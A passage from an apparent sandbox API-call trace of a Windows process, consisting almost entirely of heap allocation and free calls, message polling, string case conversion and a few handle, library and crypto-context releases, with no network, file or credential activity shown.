(HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71898 [0086.858] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9850 [0086.858] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0086.858] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0086.858] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71868 [0086.858] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0086.858] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ad8 [0086.859] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0086.859] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0086.859] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0086.859] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0086.859] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0086.859] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x29f6ea0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0086.859] CryptReleaseContext (hProv=0x9961a8, dwFlags=0x0) returned 1 [0086.859] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9be0 | out: hHeap=0x2af0000) returned 1 [0086.859] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0086.859] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bf8 | out: hHeap=0x2af0000) returned 1 [0086.859] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b20 | out: hHeap=0x2af0000) returned 1 [0086.859] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0086.859] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9be0 | out: hHeap=0x2af0000) returned 1 [0086.859] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9be0 | out: hHeap=0x2af0000) returned 1 [0086.859] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0086.859] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9af0 | out: hHeap=0x2af0000) returned 1 [0086.859] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0086.859] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718f8 | out: hHeap=0x2af0000) returned 1 [0086.860] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bb0 | out: hHeap=0x2af0000) returned 1 [0086.860] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ac0 | out: hHeap=0x2af0000) returned 1 [0086.860] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71868 | out: hHeap=0x2af0000) returned 1 [0086.860] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9700 | out: hHeap=0x2af0000) returned 1 [0086.860] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9808 | out: hHeap=0x2af0000) returned 1 [0086.860] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9718 | out: hHeap=0x2af0000) returned 1 [0086.860] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa97c0 | out: hHeap=0x2af0000) returned 1 [0086.860] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9790 | out: hHeap=0x2af0000) returned 1 [0086.860] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9850 | out: hHeap=0x2af0000) returned 1 [0086.860] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9820 | out: hHeap=0x2af0000) returned 1 [0086.860] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0086.860] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a78 | out: hHeap=0x2af0000) returned 1 [0086.860] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99a0 | out: hHeap=0x2af0000) returned 1 [0086.860] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a00 | out: hHeap=0x2af0000) returned 1 [0086.860] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b48 | out: hHeap=0x2af0000) returned 1 [0086.860] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c10 | out: hHeap=0x2af0000) returned 1 [0086.860] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99b8 | out: hHeap=0x2af0000) returned 1 [0086.860] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a30 | out: hHeap=0x2af0000) returned 1 [0086.860] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b38 | out: hHeap=0x2af0000) returned 1 [0086.860] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0086.860] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74958 | out: hHeap=0x2af0000) returned 1 [0086.860] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0086.860] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0086.860] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c60 | out: hHeap=0x2af0000) returned 1 [0086.860] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71868 | out: hHeap=0x2af0000) returned 1 [0086.860] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9ac0 [0086.860] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0086.860] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0086.860] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71868 [0086.860] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71898 [0086.860] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b20 [0086.860] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ad8 [0086.860] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a718f8 [0086.860] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9be0 [0086.861] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718f8 | out: hHeap=0x2af0000) returned 1 [0086.861] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a718f8 [0086.861] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b48 [0086.861] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0086.861] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b48 | out: hHeap=0x2af0000) returned 1 [0086.861] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718f8 | out: hHeap=0x2af0000) returned 1 [0086.861] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9be0 | out: hHeap=0x2af0000) returned 1 [0086.861] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ad8 | out: hHeap=0x2af0000) returned 1 [0086.861] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b20 | out: hHeap=0x2af0000) returned 1 [0086.861] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0086.861] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71868 | out: hHeap=0x2af0000) returned 1 [0086.861] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e680 [0086.861] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0086.861] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e680 | out: hHeap=0x2af0000) returned 1 [0086.861] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0086.861] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71868 [0086.861] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71898 [0086.861] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a00 [0086.861] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9be0 [0086.861] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a718f8 [0086.861] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bf8 [0086.861] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718f8 | out: hHeap=0x2af0000) returned 1 [0086.861] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bf8 | out: hHeap=0x2af0000) returned 1 [0086.861] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9be0 | out: hHeap=0x2af0000) returned 1 [0086.861] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a00 | out: hHeap=0x2af0000) returned 1 [0086.861] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0086.861] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71868 | out: hHeap=0x2af0000) returned 1 [0086.861] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0086.861] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ac0 | out: hHeap=0x2af0000) returned 1 [0086.861] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0086.861] FreeLibrary (hLibModule=0x76390000) returned 1 [0086.862] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bb0 | out: hHeap=0x2af0000) returned 1 [0086.862] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a78 | out: hHeap=0x2af0000) returned 1 [0086.862] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0086.862] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ecc0 | out: hHeap=0x2af0000) returned 1 [0086.862] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0086.862] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0086.862] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96e8 | out: hHeap=0x2af0000) returned 1 [0086.862] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0086.862] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71868 [0086.862] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a718f8 [0086.862] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0086.862] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f70e0 [0086.862] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9790 [0086.862] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0086.862] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0086.862] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96e8 [0086.862] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0086.862] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96e8 | out: hHeap=0x2af0000) returned 1 [0086.862] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0086.862] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9790 | out: hHeap=0x2af0000) returned 1 [0086.862] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0086.862] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f70e0 | out: hHeap=0x2af0000) returned 1 [0086.862] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718f8 | out: hHeap=0x2af0000) returned 1 [0086.862] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71868 | out: hHeap=0x2af0000) returned 1 [0086.862] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9790 [0086.862] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9670 [0086.862] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa96e8 [0086.862] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa97c0 [0086.862] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9700 [0086.862] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9808 [0086.862] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77a80 [0086.863] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9790 | out: hHeap=0x2af0000) returned 1 [0086.863] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9718 [0086.863] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9790 [0086.863] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9820 [0086.863] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0086.863] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0086.863] CloseHandle (hObject=0x2c4) returned 1 [0086.863] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9688 | out: hHeap=0x2af0000) returned 1 [0086.863] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0086.863] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aae878 | out: hHeap=0x2af0000) returned 1 [0086.864] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e640 | out: hHeap=0x2af0000) returned 1 [0086.864] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7180 | out: hHeap=0x2af0000) returned 1 [0086.864] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9820 | out: hHeap=0x2af0000) returned 1 [0086.864] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9790 | out: hHeap=0x2af0000) returned 1 [0086.864] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0086.864] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96e8 | out: hHeap=0x2af0000) returned 1 [0086.864] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9700 | out: hHeap=0x2af0000) returned 1 [0086.864] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa97c0 | out: hHeap=0x2af0000) returned 1 [0086.864] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9808 | out: hHeap=0x2af0000) returned 1 [0086.864] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9718 | out: hHeap=0x2af0000) returned 1 [0086.864] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77a80 | out: hHeap=0x2af0000) returned 1 [0086.864] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0086.864] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a08 [0086.864] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a58 [0086.864] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b58 [0086.865] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7000 [0086.865] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0086.865] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9790 [0086.865] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72aa8 [0086.865] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9688 [0086.865] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0086.865] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9688 | out: hHeap=0x2af0000) returned 1 [0086.865] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9790 | out: hHeap=0x2af0000) returned 1 [0086.865] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0086.865] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b58 | out: hHeap=0x2af0000) returned 1 [0086.865] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7000 | out: hHeap=0x2af0000) returned 1 [0086.865] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0086.865] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0086.865] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9790 [0086.865] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9808 [0086.865] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9670 [0086.865] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9688 [0086.865] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa97c0 [0086.865] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9820 [0086.865] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c10 [0086.865] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9790 | out: hHeap=0x2af0000) returned 1 [0086.865] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9850 [0086.865] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96e8 [0086.865] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9700 [0086.865] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a08 [0086.865] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0086.865] CloseHandle (hObject=0x294) returned 1 [0086.867] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0086.867] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a720e8 | out: hHeap=0x2af0000) returned 1 [0086.867] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a7a130 | out: hHeap=0x2af0000) returned 1 [0086.868] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5edc0 | out: hHeap=0x2af0000) returned 1 [0086.868] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7120 | out: hHeap=0x2af0000) returned 1 [0086.868] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9700 | out: hHeap=0x2af0000) returned 1 [0086.868] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96e8 | out: hHeap=0x2af0000) returned 1 [0086.868] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9808 | out: hHeap=0x2af0000) returned 1 [0086.868] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0086.868] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa97c0 | out: hHeap=0x2af0000) returned 1 [0086.868] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9688 | out: hHeap=0x2af0000) returned 1 [0086.868] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9820 | out: hHeap=0x2af0000) returned 1 [0086.868] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9850 | out: hHeap=0x2af0000) returned 1 [0086.868] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c10 | out: hHeap=0x2af0000) returned 1 [0086.868] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0086.868] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a720d8 [0086.868] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96b8 [0086.868] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9688 [0086.868] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a720e8 [0086.868] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a720e8 | out: hHeap=0x2af0000) returned 1 [0086.868] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96e8 [0086.868] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a720e8 [0086.868] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0086.868] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9700 [0086.868] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72628 [0086.868] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9718 [0086.868] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0086.868] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9718 | out: hHeap=0x2af0000) returned 1 [0086.869] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9700 | out: hHeap=0x2af0000) returned 1 [0086.869] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0086.869] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a720e8 | out: hHeap=0x2af0000) returned 1 [0086.869] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0086.869] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a720e8 [0086.869] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a720e8 | out: hHeap=0x2af0000) returned 1 [0086.869] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9688 | out: hHeap=0x2af0000) returned 1 [0086.869] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96e8 | out: hHeap=0x2af0000) returned 1 [0086.869] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0086.869] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0086.869] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a720d8 | out: hHeap=0x2af0000) returned 1 [0086.869] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de40 | out: hHeap=0x2af0000) returned 1 [0086.869] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9058 | out: hHeap=0x2af0000) returned 1 [0086.869] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77620 | out: hHeap=0x2af0000) returned 1 [0086.869] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72098 | out: hHeap=0x2af0000) returned 1 [0086.869] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a775f8 | out: hHeap=0x2af0000) returned 1 [0086.869] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0086.869] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9040 | out: hHeap=0x2af0000) returned 1 [0086.869] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a774e0 | out: hHeap=0x2af0000) returned 1 [0086.869] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72088 | out: hHeap=0x2af0000) returned 1 [0086.869] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a774b8 | out: hHeap=0x2af0000) returned 1 [0086.869] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9460 | out: hHeap=0x2af0000) returned 1 [0086.869] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a775a8 | out: hHeap=0x2af0000) returned 1 [0086.869] 